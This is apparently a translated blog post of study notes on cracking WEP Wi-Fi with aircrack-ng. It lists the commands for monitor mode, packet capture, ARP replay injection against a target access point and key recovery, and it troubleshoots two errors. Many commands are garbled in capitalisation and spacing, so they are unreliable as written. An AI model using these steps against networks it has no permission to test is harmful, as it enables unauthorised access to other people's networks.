Recently, I accidentally got some wireless technical materials and found a fast Wi-Fi penetration method. Although this method is not as stable as Reaver, I personally think it is much faster than Reaver in terms of time. The reason may be that the notebook for the experiment is too old. There are several problems on the way. If you have any colleagues, please give me some advice. Here we will first record these major commands for memo.
If the environment is BT5, a higher version is installed by default, so you do not need to upgrade it, but you need to attach the installation command:
Wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
Tar zxvf <name of Source File>
CD aircrack-ng-xxx
Make
Make install
The following uses WEP encryption as an example:
Check the wireless network card. The default value is wlan0. If an external network card or another wireless network card exists, select the corresponding network card to enable it.
View wireless network card information separately: iwconfig
Enable wireless NIC: ifconfig wlan0 up
Enable Nic to monitor:
Airmon-ng start wlan0
Scan wireless network information at the current location:
Airodump-ng mon0
Start to capture packets and save the. IVS suffix with the logas prefix and 6 as the AP channel.
Airodump-ng -- IVS-W longas-C 6 wlan0
When the preceding command runs, open a new terminal window and enter the following command to launch arprequest injection attacks on the target AP, in this way, an arprequest method is used to read arp request packets and forge a large number of packets and resend them again, so as to stimulate the AP to generate more packets and thus speed up the cracking process.
Aireplay-ng-3-B ap-Mac-H client-Mac mon0
When the IVS value reaches 20 thousand or above, try the following command to crack
IVS file captured by aircrack-ng
After successful cracking, keyfound! The following ACSI code is the password.
PS:
Question 1:
When you enter airodump-ng -- IVS-W longas-C 6 wlan0 in the new window, an error is returned:
IOCTL (siocswmode) failed: device or resource busy
ARP linktype is set to 1 (Ethernet)-expected arphrd_802.11,
Aephrd_ieee802.11_full or arphrd_ieee80211_prism instead. Make
Sysfs injection support was not found either.
The method I tried is to use the command:
sudo ifconfig wlan0 downsudo iwconfig wlan0 mode monitorsudo ifconfig wlan0 upsudo iwconfig wlan0
sudo airmon-ng start wlan0airodump-ng --ivs -w longas -c 6 wlan0
You can.
Question 2:
When aireplay-ng-3-B ap-Mac-H client-Mac mon0, an error occurs:
Couldn't determine current channel for mon0, you shocould either force the operation with -- ignore-negative-one or apply a kernel patch
Because this command does not directly affect the results, and does not find a proper solution for the moment. If you have a good solution, please advise.
Here, we only briefly list the main Commands used. They are only for lab reference and cannot be used for illegal operations. Otherwise, the consequences will be borne by you.
This article from the "ice Chen Sub" blog, please be sure to keep this source http://icecrown.blog.51cto.com/6667141/1558511
Some study notes and questions about aircrack-ng